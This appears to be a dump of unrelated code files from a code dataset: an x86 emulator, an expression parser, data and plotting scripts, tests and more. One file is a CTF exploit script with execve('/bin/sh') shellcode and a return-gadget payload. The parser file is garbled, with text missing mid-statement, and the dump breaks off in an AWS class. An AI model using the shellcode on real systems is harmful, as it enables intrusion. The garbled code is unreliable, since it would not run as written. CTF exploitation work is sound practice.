s='chkAF:{0:09b}({0}) , {1:09b}({1}) -> {2:09b}({2}) AF:{3}'.format(v1,v2,v3,retval)\n        cpu.dbgp(s)\n        return retval\n\n\n    def flagchk(self,flg,o1,o2,r,rt):\n        if flg & cpu.CF:\n            if cpu.chkCF(self._scf):\n                self.flagOn(cpu.CF)\n            else:\n                self.flagOff(cpu.CF)\n\n        if flg & cpu.ZF :\n            if cpu.chkZF(r,rt):\n                self.flagOn(cpu.ZF)\n            else:\n                self.flagOff(cpu.ZF)\n\n        if flg & cpu.OF :\n            if cpu.chkOF(o1,o2,r,rt):\n                self.flagOn(cpu.OF)\n            else:\n                self.flagOff(cpu.OF)\n\n        if flg & cpu.SF :\n            if cpu.chkMSB(r,rt):\n                self.flagOn(cpu.SF)\n            else:\n                self.flagOff(cpu.SF)\n\n        if flg & cpu.AF :\n            if cpu.chkAF(o1,o2,r):\n                self.flagOn(cpu.AF)\n            else:\n                self.flagOff(cpu.AF)\n\n        if flg & cpu.PF :\n            if cpu.chkPF(r,rt):\n                self.flagOn(cpu.PF)\n            else:\n                self.flagOff(cpu.PF)\n        pass\n\n\n    def getflag(self,flg):\n        return True if self.eflags & flg else False\n\n\n    def flagOff(self,flag):\n        v = self.eflags 
& ( ~flag )\n        self.eflags = v\n        #cpu.dbgp('flagOff:{1:b} eflags:{0:b}'.format(self.eflags,flag))\n        return self.eflags\n\n\n\n    def flagOn(self,flag):\n        v = self.eflags | flag\n        self.eflags = v\n        #cpu.dbgp('flagOn:{1:b} eflags:{0:b}'.format(self.eflags,flag))\n        return self.eflags\n\n\n\n    def dumpRegister(self,index):\n        if index == -1 :\n            print('DumpRegister')\n            for i in range(0, cpu.r_NREG):\n                rp=cpu.r2reg[i]\n                s='[{0}]:{1} '.format(cpu.regp[rp][2], hex(self.rReg(rp)))\n                print(s,end=\"\")\n            print()\n        elif index < -1 :\n            print('DumpRegister Main')\n            for i in range(0, 8):\n                rp=cpu.r2reg[i]\n                s='[{0}]:{1} '.format(cpu.regp[rp][2], hex(self.rReg(rp)))\n                print(s,end=\"\")\n            print()\n        else:\n            s='[{0}]:{1}'.format(cpu.regp[index][2] , hex(self.rReg(index)))\n            print(s)\n\n        s='DB:{0}'.format(self.DB)\n        cpu.dbgp(s)\n\n        print('eip:0x{0:X}({0})'.format(self.eip))\n        s='eflags:{0:b}'.format(self.eflags)\n        print(s)\n\n        '''\n        OF=2**11 #status:overflow\n        DF=2**10 #control:direction\n        IF=2**9 #control:interrupt\n        TF=2**8 #control:trap\n        SF=2**7 #status:sign\n        ZF=2**6 #status:zero\n        AF=2**4 #status:auxiliary carry\n        PF=2**2 #status:parity\n        CF=2**0 #status:carry\n        '''\n        s='OB:{0} DA:{1} I9:{2} T8:{3} S7:{4} Z6:{5} A4:{6} P2:{7} C0:{8}'.format(\n            True if self.eflags & cpu.OF else False ,\n            True if self.eflags & cpu.DF else False ,\n            True if self.eflags & cpu.IF else False ,\n            True if self.eflags & cpu.TF else False ,\n            True if self.eflags & cpu.SF else False ,\n            True if self.eflags & cpu.ZF else False ,\n            True if self.eflags & cpu.AF else False ,\n            True if self.eflags & cpu.PF else False ,\n            True if self.eflags & cpu.CF else False)\n        print(s)\n\n\n\n    def dumpMemory(self,start,finish):\n        for i in range(start,finish+1):\n            m = i % (self.mem.memmax + 1)\n            print('mem[{2}:{0}]:0x{1:X}({1})'.format(m, self.rMem(m, cpu.RTr8,0),0))\n\n    def opstat(o1,o2,r,rt):\n        s='opstat OP1:0x{0:X}({0})({1}) OP2:0x{2:X}({2})({3}) -> RESULT:0x{4:X}({5})({3})'.format(o1 , cpu.sb2sd(o1,rt) , o2 , cpu.sb2sd(o2,rt) , r , cpu.sb2sd(r,rt))\n        cpu.dbgp(s)\n\n\n\n    def readMem(self,seg):\n        #v = self.mem.get(self.eip)\n        v = self.rMem(self.eip, cpu.RTr8, seg)\n        s = 'readM[{2}:{0}]:0x{1:X}({1})'.format(self.eip , v & cpu.mask[cpu.RTr8], seg)\n        cpu.dbgp(s)\n        return (v & cpu.mask[cpu.RTr8])\n\n\n    def readNextMem(self,seg):\n        self.eip += 1\n        #v = self.mem.get(self.eip)\n        v = self.rMem(self.eip, cpu.RTr8, seg)\n        s = 'readNM[{2}:{0}]:0x{1:X}({1})'.format(self.eip , v & cpu.mask[cpu.RTr8] ,seg)\n        cpu.dbgp(s)\n        return (v & cpu.mask[cpu.RTr8])\n\n\n\n    def ModRM(self, mod, RTro, RTrm):\n        self.Mro = (mod & cpu.maskRG)>>cpu.shftG\n        self.Mrm = (mod & cpu.maskRM)\n        self.Mod = (mod & cpu.maskMB)>>cpu.shftM\n        s='ModRM:0x{0:02X} Mod:{1:02b}({1}) Reg:{2:03b}({2}) rm:{3:03b}({3})'.format(mod, self.Mod, self.Mro, self.Mrm)\n        #self.dumpMemory(self.eip,self.eip+3)\n        cpu.dbgp(s)\n\n        if not self.Mod == 0b11:\n            self.ro = cpu.mod1116[self.rexb][self.Mro][RTro]\n\n            self.rm = (self.ftbl16[self.Mod][self.Mrm])()\n            s='ModRM: reg={0} rm=M[{1}]:{2}'.format(cpu.regp[self.ro][2], self.rm, self.rMem(self.rm,RTrm,self.CS))\n            cpu.dbgp(s)\n        else:\n            self.rm = cpu.mod1116[self.rexb][self.Mrm][RTrm]\n            self.ro = cpu.mod1116[self.rexb][self.Mro][RTro]\n            s='ModRM: reg={0} rm={1}({2})'.format(cpu.regp[self.ro][2], cpu.regp[self.rm][2],self.rReg(self.rm))\n            cpu.dbgp(s)\n\n        self.drm = self.Mod\n\n        return self.Mod, self.Mro, self.Mrm\n\n\n\n    def segOVR(self,defaultseg):\n        return self.seg if self.override == True else defaultseg\n\n\n\n    def intImm8(self):\n        Imm8 = self.readNextMem(self.CS)\n\n        
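# INT 0x10 is the BIOS video service; AH selects the sub-function,\n        # and AH=0x0E (teletype output) prints the character held in AL\n        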
if Imm8 == 0x10 :\n            ah=self.rReg(cpu.ah_)\n            al=self.rReg(cpu.al_)\n            s='INT 0x{0:X}'.format(Imm8)\n            cpu.msg(s)\n            if ah == 0 and al == 0x03:\n                pass\n            elif ah == 0x0E :\n                if al == ord('\\n') :\n                    cpu.msg(\n                        self.displaytext\n                    )\n                    self.dumpMemory(self.eip, self.eip)\n                else:\n                    cpu.msg(\n                        chr(al)\n                    )\n                    self.displaytext += chr(al)\n            else:\n                s='Not Implemented data rax=0x{0:X}'.format(self.rReg(cpu.rax_))\n                cpu.msg(s)\n                raise Exception\n        else:\n            s='Not Implemented Imm={0}'.format(Imm8)\n            cpu.msg(s)\n            raise Exception\n\n\n    def run(self,eip,size):\n        self.eip=eip\n        runflag = True\n        while runflag == True :\n            self.op = self.rMem(self.eip, cpu.RTr8, self.CS)\n            s='=== run [{2}:{0}]:op=0x{1:02X}'.format(self.eip, self.op, self.CS)\n            #cpu.msg(s)\n            cpu.dbgp(s)\n            if not self.eip == size:\n                self.execute(self.op)\n                self.opStr = ''\n            else:\n                runflag = False\n                cpu.msg('End')\n                raw=input('hit any')\n                sys.exit(0)\n            self.eip += 1\n\n\n\n    def execute(self,op):\n        '''\n        show operand\n        '''\n        s = 'execute [{0}]:op=0x{1:02X} '.format( self.eip , op )\n        cpu.msg(s)\n\n\n    def load(self,filename):\n        try:\n            with open(filename,'rb') as f:\n                i = 0\n                b = f.read(1)\n                while not b == b'' :\n                    self.wMem(i, cpu.b2i(b), cpu.RTr8, self.CS)\n                    b = f.read(1)\n                    i += 1\n                return i\n        except:\n            s='{0} open error'.format(filename)\n            cpu.msg(s)\n            raise Exception\n\n\n    def b2i(val):\n        return int.from_bytes(val , byteorder = 'little')\n\n    def setrex(self,op):\n        self.rexw = self.rexr = self.rexx = self.rexb = 0\n\n        self.rexb = op & cpu.REXb\n        self.rexx = op & cpu.REXx\n        self.rexr = op & cpu.REXr\n        self.rexw = op & cpu.REXw\n\n\n    def chDB(self): #16 or 32\n        db = ((self.DB + 1) % cpu.RTr16) + cpu.RTr16\n        self.DB = db\n\n\n    def chDB_R(self): #32 or 64\n        db =((self.DB + 1) % cpu.RTr32) + cpu.RTr32\n        self.DB = db\n\n\nif __name__ == '__main__':\n    c=cpu(memory(1))\n    print('Representative Register')\n    print(cpu.r2reg)\n    input()\n\n    print(cpu.regp[c.mod1116[0][cpu.rax_][cpu.RTr8]][2])\n    input()\n\n    c.dumpRegister(-2)\n    c.wReg(cpu.rax_,0x1234557890)\n    c.wReg(cpu.ah_,0x20)\n    c.wReg(cpu.ch_,0xff)\n    c.wReg(cpu.xmm7_,0xfffdffdfd)\n    c.dumpRegister(cpu.ah_)\n    c.dumpRegister(-2)\n    s=cpu.signex(0xff01, cpu.RTr16, cpu.RTr32)\n    print(hex(s),cpu.sb2sd(s,cpu.RTr32))\n\n\n    c.wReg(cpu.eax_,0x0E00+ord('a'))\n    c.wMem(1,0x10, cpu.RTr8, c.CS)\n    c.dumpMemory(0,10)\n    c.eip=0\n    c.intImm8()\n\n    size=c.load('HelloWorld')\n    #c.run(0,size)\n\n    c.dumpMemory(0,10)\n    c.dumpMemory(940,944)\n    c.dumpRegister(-2)\n    m = c.ModRM(0b10101110, cpu.RTr8, cpu.RTr8)\n    print(c.Mod,c.Mro,c.Mrm, c.rReg(c.ro),c.rm)\n\n    def testModRM():\n        print()\n        print('test ModRM')\n        c.eip=0\n        modp=[\n            0b00000000,\n            0b01000000,\n            0b10000000,\n            0b11000000\n        ]\n        pt=[\n            ['bx+si',\n            'bx+di',\n            'bp+si',\n            'bp+di',\n            'si',\n            'di',\n            'disp16',\n            'bx'],\n            ['bx+si+disp8',\n            'bx+di+disp8',\n            'bp+si+disp8',\n            'bp+di+disp8',\n            'si+disp8',\n            'di+disp8',\n            'bp+disp16',\n            'bx+disp8'],\n            ['bx+si+disp16',\n            'bx+di+disp16',\n            'bp+si+disp16',\n            'bp+di+disp16',\n            'si+disp16',\n            'di+disp16',\n            'bp+disp16',\n            'bx+disp16'],\n            ['al ax',\n            'cl cx',\n            'dl dx',\n            'bl bx',\n            'ah sp',\n            'ch bp',\n            'dh si',\n            'bh di']\n        ]\n\n        for i in range(0,35):\n            c.wReg(i,i)\n\n        #for i in range(0,c.mem.memmax):\n            #c.wMem(i,i,cpu.RTr8,0)\n\n        j=0\n        for p in modp[0:3]:\n            for i in range(0,8):\n                mod = p |(i<<3)|i\n                c.ModRM(mod,cpu.RTr8,cpu.RTr8)\n\n                s='{0:08b}:'.format(mod)+pt[j][i]+':'+str(c.rm)\n                print(s)\n                c.dumpRegister(-2)\n                c.dumpMemory(c.eip,c.eip+5)\n                c.dumpMemory(c.rm,c.rm+5)\n\n            j += 1\n\n\n\n\n    testModRM()\n\n    def rexp():\n        print('rex.b:{0}'.format(c.rexb))\n        
print('rex.x:{0}'.format(c.rexx))\n        print('rex.r:{0}'.format(c.rexr))\n        print('rex.w:{0}'.format(c.rexw))\n\n    def testrex():\n        for i in range(0x40,0x50):\n            c.setrex(i)\n            print('rex:{0:08b}'.format(i))\n\n    def testchdb():\n        print('DB={0} 2=>16 3=>32'.format(c.DB))\n        c.chDB()\n        print('changed DB:{0}'.format(c.DB))\n        c.chDB()\n        print('changed DB:{0}'.format(c.DB))\n        c.chDB()\n        print('changed DB:{0}'.format(c.DB))\n\n    testrex()\n    c.setrex(0)\n    rexp()\n\n    testchdb()\n\n    def testflagchk():\n        flg = cpu.CF|cpu.AF\n        c.flagchk(flg,127,127,254,cpu.RTr8)\n        c.dumpRegister(-2)\n        flg = cpu.CF|cpu.AF|cpu.ZF|cpu.PF\n        c.flagchk(flg,127,202,329,cpu.RTr8)\n        c.dumpRegister(-2)\n        cpu.msg(cpu.sb2sd(256,cpu.RTr8))\n\n    testflagchk()\n","repo_name":"moto38/x86-PC-emulator","sub_path":"x86base.py","file_name":"x86base.py","file_ext":"py","file_size_in_byte":50407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"71465977689","text":"year = int(input('Enter the year: '))\r\nmonth = input('Enter the month: ')\r\n\r\nmonths_31 = ['January', 'March', 'May', 'July', 'August', 'October', 'December']\r\nmonths_30 = ['April', 'June', 'September', 'November']\r\n\r\nif month in months_31:\r\n    print('31')\r\nif month in months_30:\r\n    print('30')\r\nif month == 'February':\r\n    if year % 4 == 0 and year % 100 != 0:\r\n        print('29')\r\n    elif year % 400 == 0:\r\n        print('29')\r\n    else:\r\n        print('28')\r\n","repo_name":"ArmaanBrar2001/100-Days-Coding-Python","sub_path":"day-7.py","file_name":"day-7.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28381160490","text":"# -*- coding: utf-8 -*-\r\n'''\r\nCreated on 25.09.2017\r\n\r\n@author: Leonard\r\n'''\r\n#from Expression import Expression,ExpressionBlock,NumberElement,VariableElement\r\n#from OperatorElement import multiplyOperator\r\n#from PredefinedObjects import functions\r\nimport Expression\r\nimport Tools\r\nimport PredefinedObjects\r\nimport warnings\r\n\r\nSTARTBLOCK = ['(','[']\r\nENDBLOCK = [')',']']\r\n\r\nexpression = Expression.Expression()\r\n\r\ndef ParseInput(input):\r\n    global expression\r\n    PredefinedObjects.SetupObjects()\r\n    expression.expressions = ParseString(input).expressions\r\n    return expression\r\n    \r\ndef ParseString(s):\r\n    exp = Expression.ExpressionBlock()\r\n    cur_block,i = ParseBlock(s,0,0)\r\n    for el in cur_block.expressions:\r\n        exp.expressions.append(el)\r\n\r\n    \r\n    exp.expressions = PackFunctions(exp)\r\n    exp.expressions = PackPowerBlocks(exp)\r\n    exp.expressions = PackQuotientBlocks(exp)\r\n\r\n    exp.expressions = AddMultiplyOperators(exp)\r\n\r\n    return exp\r\ndef ParseBlock(input, start_index, depth):\r\n    global expression\r\n    cur_block = Expression.ExpressionBlock()\r\n    i = start_index\r\n    var_last = False\r\n    while ilen(func.name):\r\n                endVariables = ind\r\n                func = f\r\n                #break\r\n        \r\n        if (func == None or endVariables != i): # adds all the variables before the function, joined with multiply operators\r\n            for k in range(endVariables-i):\r\n                vars = True\r\n                \r\n                var = word[k]\r\n                \r\n                variableElement = None\r\n                for variableEl in expression.variables:\r\n                    if variableEl.variable == var:\r\n                        variableElement = variableEl\r\n                        break\r\n                if (variableElement == None):\r\n                    variableElement = Expression.VariableElement(var)\r\n                    expression.variables.append(variableElement)\r\n                \r\n                \r\n                cur_block.append(variableElement)\r\n                if (k!=endVariables-i-1):\r\n                    cur_block.append(Expression.multiplyOperator)\r\n            var_last = vars \r\n            if (func != None and vars): # and, if there is one, 
the function as well\r\n                cur_block.append(Expression.multiplyOperator)\r\n                cur_block.append(func)\r\n            elif (func != None):\r\n                cur_block.append(func)\r\n            \"\"\" if (func):\r\n                cur_block.append(func)\r\n            else: # product of variables\r\n                for k in range(len(word)):\r\n                    var = word[k]\r\n                    cur_block.append(VariableElement(var))\r\n                    if (k!=(len(word)-1)):\r\n                        cur_block.append(multiplyOperator)\"\"\"\r\n            i = endIndex\r\n        i += 1\r\n    \r\n    return cur_block,i\r\n    \r\ndef getNumber(input, i):\r\n    num = 0\r\n    isnum = True\r\n    iscomma = False\r\n    preComma = []\r\n    comma = []\r\n    index = i\r\n    while isnum and index into a FunctionBlock\r\n    '''\r\n    new_expressions = []\r\n    i = 0\r\n    while i= 3)\n        cond_RT = (~df['RT'])\n        cond_few_percs = ((df['%/syms'] > 2) | (df['%/syms'].isna()))\n        cond_dervs = ((df['call#'] > 1) & (df['put#'] > 1))\n\n        df_watch = (df[cond_3 & cond_RT & cond_few_percs\n                    & cond_dervs].copy())\n\n        return df_watch\n\n    @classmethod\n    def _create_df_splits(cls, self, df_watch, **kwargs):\n        \"\"\"Create dataframe of splits, strikes, prices.\"\"\"\n        watch_rows = (df_watch['text']\n                      .str.extractall(r'(\\$[A-Z]+.+)')\n                      .dropna()[0]\n                      .str.split('|', expand=True))\n\n        call_splits = (watch_rows[0].str.strip()\n                       .str.split(' +', expand=True)\n                       .drop(columns=[2])\n                       .rename(columns={0: 'symbol',\n                                        1: 'callS',\n                                        3: 'callP'}))\n        put_splits = (watch_rows[1].str.strip()\n                      .str.split(' +', expand=True)\n                      .drop(columns=[1])\n                      .rename(columns={0: 'putS',\n                                       2: 'putP'}))\n\n        df_allW = (call_splits.join(put_splits)\n                   .reset_index(level=1, drop=True)\n                   .reset_index()\n                   .rename(columns={'index': 'ogIdx'}))\n\n        df_allW['symbol'] = df_allW['symbol'].str.replace('\\$', '', regex=True)\n        col_order = ['symbol', 'callP', 'callS', 'putP', 'putS', 'ogIdx']\n        df_allW = df_allW[col_order]\n\n        return df_allW\n","repo_name":"webclinic017/algotrading-20","sub_path":"twitter/watchlists/watchlist_methods/find_watchlists.py","file_name":"find_watchlists.py","file_ext":"py","file_size_in_byte":3951,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"12014996051","text":"#!/usr/bin/env python\nimport ROOT\n\nimport ups_mc_model\nUpsMCModel = ups_mc_model.UpsMCModel\n\nimport tools\n\nfrom IPython import embed as shell  # noqa\n\nfrom AnalysisPython import LHCbStyle  # noqa\n\ndef main():\n    canvas = ROOT.TCanvas(\"c_ups\", \"c_ups\", 800, 600)\n    cfg = tools.load_config(\"mc\")\n    cfg_tuples = tools.load_config(\"tuples\")\n\n    utree = ROOT.TChain(\"UpsilonAlg/Upsilon\")\n    utree.Add(cfg_tuples[\"mc2011\"][0])\n    cut = cfg[\"decays\"][\"ups1s\"][\"ucut\"]\n    cut[\"pt_ups\"] = [18, 22]\n    cut_str = tools.cut_dict2str(cut)\n\n    h = ROOT.TH1D(\"h_ups\", \"h_ups\", 100, 9.2, 9.7)\n    utree.Draw(\"m_dtf>>%s\" % h.GetName(), cut_str)\n\n    model = UpsMCModel(\n        canvas=canvas,\n        data=h,\n        binning=[100, 9.2, 9.7],\n\n    )\n    model.fitData()\n    print(model)\n    tools.save_figure(\"mc/ups1s/ups2011_dcb\")\n\nif __name__ == '__main__':\n    main()\n","repo_name":"mazurov/thesis-code","sub_path":"mcups.py","file_name":"mcups.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"11912781347","text":"\"\"\"image manager for the machine learning project.\"\"\"\n\nimport os\nimport cv2\nimport multiprocessing as mp\nimport tqdm\n\n\nclass ImageReader():\n    \"\"\"Manages input and output of the image dataset.\"\"\"\n\n    def __init__(self):\n        \"\"\"Initialize class variables.\"\"\"\n        self._smalldata_path = \"Dataset/final/\"\n        self._fulldata_path = \"Dataset/images/\"\n\n    
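# pool worker: loads one image with OpenCV and takes the text before\n    # the first underscore of the filename as the author label\n    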
def _save_image(self, image_name):\n author = image_name.split(\"_\")[0]\n image = cv2.imread(self._smalldata_path + image_name)\n if image is None:\n raise Exception(\"Path \\\"{}\\\" is not an image\".format(\n self._smalldata_path + image_name))\n return (image, author)\n\n def open_images_small(self):\n \"\"\"Open images of the resized dataset and saves them to a list.\"\"\"\n image_list = []\n label_list = []\n im_list = os.listdir(self._smalldata_path)\n print(\"Loading images: \")\n pool = mp.Pool(mp.cpu_count())\n\n image_list = pool.map(self._save_image, tqdm.tqdm(im_list))\n pool.close()\n label_list = [elem[1] for elem in image_list]\n image_list = [elem[0] for elem in image_list]\n return image_list, label_list\n\n def open_sample(self):\n \"\"\"Return single image for testing.\"\"\"\n return cv2.imread(self._smalldata_path + \"Andy_Warhol_99.jpg\")\n","repo_name":"AlejandroFernandezLuces/artist_from_art","sub_path":"src/imagereader.py","file_name":"imagereader.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"11916636202","text":"from typing import Any\n\nimport pytest\n\nfrom manifestoo_core.manifest import InvalidManifest, Manifest\n\n\n@pytest.mark.parametrize(\n (\"key\", \"value\"),\n [\n (\"name\", \"the name\"),\n (\"name\", None),\n (\"version\", \"1.0.0\"),\n (\"version\", None),\n (\"license\", \"GPL-3\"),\n (\"license\", None),\n (\"development_status\", \"Beta\"),\n (\"development_status\", None),\n (\"depends\", [\"a\", \"b\"]),\n (\"external_dependencies\", {\"python\": [\"httpx\"]}),\n (\"installable\", True),\n (\"installable\", False),\n ],\n)\ndef test_manifest_valid_value(key: str, value: Any) -> None:\n manifest = Manifest.from_dict({key: value})\n assert getattr(manifest, key) == value\n\n\n@pytest.mark.parametrize(\n (\"key\", \"value\"),\n [\n (\"name\", 1),\n (\"version\", 1),\n (\"license\", [\"i\"]),\n (\"development_status\", {}),\n (\"depends\", 1),\n (\"depends\", {}),\n (\"depends\", None),\n (\"external_dependencies\", {1: {}}),\n (\"external_dependencies\", None),\n (\"external_dependencies\", [1]),\n (\"installable\", 1),\n (\"installable\", None),\n ],\n)\ndef test_manifest_invalid_value(key: str, value: Any) -> None:\n manifest = Manifest.from_dict({key: value})\n with pytest.raises(InvalidManifest):\n getattr(manifest, key)\n\n\ndef test_manifest_non_str_keys() -> None:\n with pytest.raises(InvalidManifest):\n Manifest.from_dict({\"name\": \"the name\", 1: \"1\"})\n\n\ndef test_manifest_invalid_syntax() -> None:\n with pytest.raises(InvalidManifest):\n Manifest.from_str('{\"name\": \"the name\", ...}')\n\n\n@pytest.mark.parametrize(\n (\"key\", \"default\"),\n [\n (\"name\", None),\n (\"version\", None),\n (\"license\", None),\n (\"development_status\", None),\n (\"depends\", []),\n (\"external_dependencies\", {}),\n (\"installable\", True),\n ],\n)\ndef test_manifest_default_value(key: str, default: Any) -> None:\n manifest = Manifest.from_dict({})\n assert getattr(manifest, key) == default\n","repo_name":"acsone/manifestoo-core","sub_path":"tests/test_manifest.py","file_name":"test_manifest.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"31"} +{"seq_id":"16064118552","text":"from pwn import * \nimport os \nos.system('clear')\n\ndef start(argv=[], *a, **kw):\n if args.REMOTE:\n return remote(sys.argv[1], sys.argv[2], *a, **kw)\n else:\n return 
process([exe] + argv, *a, **kw)\n\nexe = './space'\nelf = context.binary = ELF(exe, checksec=True)\ncontext.log_level = 'DEBUG'\n\nsh = start()\ncall_eax = 0x08049019\nlog.info('CALL_EAX gadget --> %#0x', call_eax)\n\n# 8 bytes\n# we can't do mov eax, 0xb, because the length must stay within 10 bytes\n# why 11? because the distance from the first A to the last A is 11\n# it will loop through the last offset before the 8-byte space\nfirst_shell = \"\"\"\nxor ecx, ecx\npush ecx\npush 0xb \npop eax\njmp $+11\n\"\"\"\nshell_1 = asm(first_shell)\nprint('[INFO] --> LENGTH SHELL 1',len(shell_1))\n\n# 18 bytes\n# adding 2 NOPs as padding so our shellcode length is exactly 18\nsecond_shell = \"\"\"\nxor edx, edx\npush 0x68732f2f # //sh\npush 0x6e69622f # bin\nmov ebx, esp\nint 0x80\nnop \nnop \n\"\"\"\nshell_2 = asm(second_shell)\nprint('[INFO] --> LENGTH SHELL 2',len(shell_2))\n\np = flat([\n    shell_2,\n    call_eax,\n    shell_1\n])\n\nsh.sendlineafter(b'>',p)\nsh.interactive()\n","repo_name":"jon-brandy/hackthebox","sub_path":"Categories/Pwn/Space/ret2shell_space.py","file_name":"ret2shell_space.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"31"} +{"seq_id":"42233449815","text":"from sys import stdin\n\nn = int(stdin.readline())\ngraph = [0] * 1001\nmax_x = 0\nmax_y = 0\nfor _ in range(n):\n    x, y = map(int, stdin.readline().split())\n    max_x = max(max_x, x)\n    max_y = max(max_y, y)\n    graph[x - 1] = y\n\nindex = graph.index(max_y)  # index of the maximum height\ncheck = 0\nresult = 0\n\n# from the left edge up to the index of the maximum\nfor i in range(index):\n    check = max(check, graph[i])  # update when the running max height changes\n    result += check  # add the current max height\ncheck = 0\n\n# from the right edge back to the index of the maximum\nfor i in range(max_x, index, -1):\n    check = max(check, graph[i])  # update when the running max height changes\n    result += check  # add the current max height\n\nprint(result + max_y)  # result + the maximum height\n","repo_name":"nzkim1234/Algorithm","sub_path":"BOJ/2304.py","file_name":"2304.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6897491461","text":"import numpy as np\nfile = open(\"./test.csv\")\ncsvFile = np.loadtxt(file, delimiter=\",\", skiprows=0)\nn = csvFile.shape[0]\nA = np.ones((n,2))\nA[:,0] = csvFile[:,0]\nB = csvFile[:,1]\n\nM = csvFile[:,0:2]\nR = np.corrcoef(M, rowvar = False)[0,1]\nprint(\"R^2:\",R*R)\n\nQ, R = np.linalg.qr(A, mode='complete')\nQTB = (Q.T.dot(B))\nB0 =QTB[1]/R[1,1]\nB1 = (QTB[0]-R[0,1]*B0)/R[0,0]\nprint(\"B0:\",B0)\nprint(\"B1:\",B1)\n\n# Get complement\nA[:,0] = csvFile[:,1]\nB = csvFile[:,0]\n\nQ, R = np.linalg.qr(A, mode='complete')\nQTB = (Q.T.dot(B))\nB0 =QTB[1]/R[1,1]\nB1 = (QTB[0]-R[0,1]*B0)/R[0,0]\nprint(\"B0':\",B0)\nprint(\"B1':\",B1)\n\nsig = np.cov(M, rowvar=False, bias= True)\nprint(\"xy:\",sig[0][1])\nprint(\"y^2:\",sig[1,1])\n\n","repo_name":"ramnreddy15/ML-Course","sub_path":"Unit1/.ipynb_checkpoints/1-Green-01-checkpoint.py","file_name":"1-Green-01-checkpoint.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"23660342130","text":"import datasets\nimport numpy as np\nfrom minichain import EmbeddingPrompt, TemplatePrompt, start_chain\nimport json\n\ndata = datasets.load_dataset(\"xyzNLP/nza-ct-zoning-codes-text\")\n\nd = data[\"train\"].filter(lambda x: x[\"Town\"] == \"madison\")\nd.add_faiss_index(\"embeddings\")\n\nclass KNNPrompt(EmbeddingPrompt):\n    def parse(self, out, inp):\n        res = 
self.data.get_nearest_examples(\"embeddings\", np.array(out), 3)\n docs = [(t.replace(\"CELL (\", f\"CELL C{p} (\"), p)\n for t, p in zip(res.examples[\"Text\"],\n res.examples[\"Page\"])]\n return {\"docs\": docs}\n\nclass DistrictsPrompt(TemplatePrompt):\n template_file = \"districts.pmpt.tpl\"\n \ndef get_districts(d):\n with start_chain(\"districts\") as backend:\n prompt = KNNPrompt(backend.OpenAIEmbed(), d).chain(DistrictsPrompt(backend.OpenAI(max_tokens=512 + 128)))\n result = prompt(\"table of contents residential commercial business zoning districts district below 1 family multi family permit\")\n print(\"The Districts in the town are:\", json.loads(result))\n \n return json.loads(result)\n\nclass MultiFamilyPrompt(TemplatePrompt):\n template_file = \"lot_area.pmpt.tpl\"\n\ndef get_multifamily(d, districts):\n with start_chain(\"allowed\") as backend:\n knn = KNNPrompt(backend.OpenAIEmbed(), d)\n prompt = MultiFamilyPrompt(backend.OpenAI(max_tokens=256))\n for x in districts:\n \n out = knn(f\"Section XX and table about zoning district called {x['T']} with title {x['Z']} Minimum Lot Area Front Setback Maximum Building Height\")\n result = prompt({\"docs\": out[\"docs\"], \"zone_name\": x['T'], \"zone_abbreviation\": x['Z']})\n print(\"District\", x['T'], result)\n\n# districts = get_districts(d)\ndistricts = [{\"Z\": \"Affordable Housing Distrct\", \"T\": \"AHD\"}]\nget_multifamily(d, districts)\n","repo_name":"National-Zoning-Atlas/zoning-gpt","sub_path":"zoning/district_extraction/districts_sizes.py","file_name":"districts_sizes.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"} +{"seq_id":"31346212902","text":"import os\nfrom pathlib import Path\n\nimport matplotlib.pyplot as plt\n\n\ndef _handle_dirs(pathname, foldername, subfoldername):\n path = Path(pathname)\n if foldername is not None:\n path = path / foldername\n if not os.path.isdir(path):\n os.mkdir(path)\n if subfoldername is not None:\n path = path / subfoldername\n if not os.path.isdir(path):\n os.mkdir(path)\n return path\n\n\nFIG_PATH = Path(__file__).parent.parent.parent.parent\nFIG_PATH = FIG_PATH / \"results\"\nFIG_PATH = FIG_PATH / \"figs\"\n\nOUT_PATH = Path(__file__).parent.parent.parent.parent\nOUT_PATH = OUT_PATH / \"results\"\nOUT_PATH = OUT_PATH / \"outputs\"\n\n\ndef savefig(\n name,\n format=\"png\",\n dpi=300,\n foldername=None,\n subfoldername=None,\n pathname=FIG_PATH,\n bbox_inches=\"tight\",\n pad_inches=0.5,\n save_on=True,\n transparent=False,\n print_out=False,\n **kws,\n):\n if save_on:\n path = _handle_dirs(pathname, foldername, subfoldername)\n savename = path / str(name + \".\" + format)\n plt.savefig(\n savename,\n format=format,\n facecolor=\"white\",\n transparent=transparent,\n bbox_inches=bbox_inches,\n pad_inches=pad_inches,\n dpi=dpi,\n **kws,\n )\n if print_out:\n print(f\"Saved figure to {savename}\")\n\n\ndef get_out_dir(foldername=None, subfoldername=None, pathname=OUT_PATH):\n path = _handle_dirs(pathname, foldername, subfoldername)\n return path","repo_name":"bdpedigo/networks-course","sub_path":"pkg/pkg/io/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"31"} +{"seq_id":"35702920845","text":"#!/usr/bin/python3\n\nimport boto3\nimport botocore\nimport logging\nimport json\nimport pprint\nimport requests\nimport sys\nimport cloudprovider\n\n\nclass CloudProviderAws( 
